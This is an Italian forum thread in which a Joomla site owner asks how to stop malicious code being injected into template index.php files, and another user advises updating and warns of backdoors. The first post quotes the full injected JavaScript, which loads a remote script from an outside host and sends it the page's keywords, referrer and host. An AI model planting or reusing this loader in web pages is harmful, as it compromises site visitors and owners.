sicurezza joomla 2.5/3 e script inject

[giuseppe121]

Salve a tutti,
c'e' qualche protezione che potrei implementare per evitare che in tutti i template la pagina index.php  venga attaccata per inserire questo codice:


<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://stolarz.home.pl/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://stolarz.home.pl/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas

• .name.toLowerCase()=="keywords"){keywords+=metas
• .content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

grazie

[alexred]

su Joomla 2.5 c'è ben poco da fare, è una versione obsoleta che non è più supportata e con bug noti di sicurezza, quindi facile da "bucare" per i malintenzionati che vogliono modificare i file del tuo sito.
Su Joomla 3 devi mantenere aggiornata la versione di Joomla all'ultima disponibile (ad oggi la 3.5.1) e tutte le estensioni esterne installate aggiornate alle ultime versioni disponibili.

Poi però devi anche valutare che se sono già riusciti a "bucarti" il sito perchè non era aggiornato ed ora sono dentro possono aver inserito una loro porta di accesso ed anche se aggiorni continueranno ad entrare.

[giuseppe121]

Ciao,
grazie per la risposta.
su joomla 3 aggiornato con tutti i template ed i plugin, ritrovo continuamente questo script.
Non riesco a risolvere attivando qualche modulo di sicurezza oppure il file.htaccess con qualche direttiva precisa?


grazie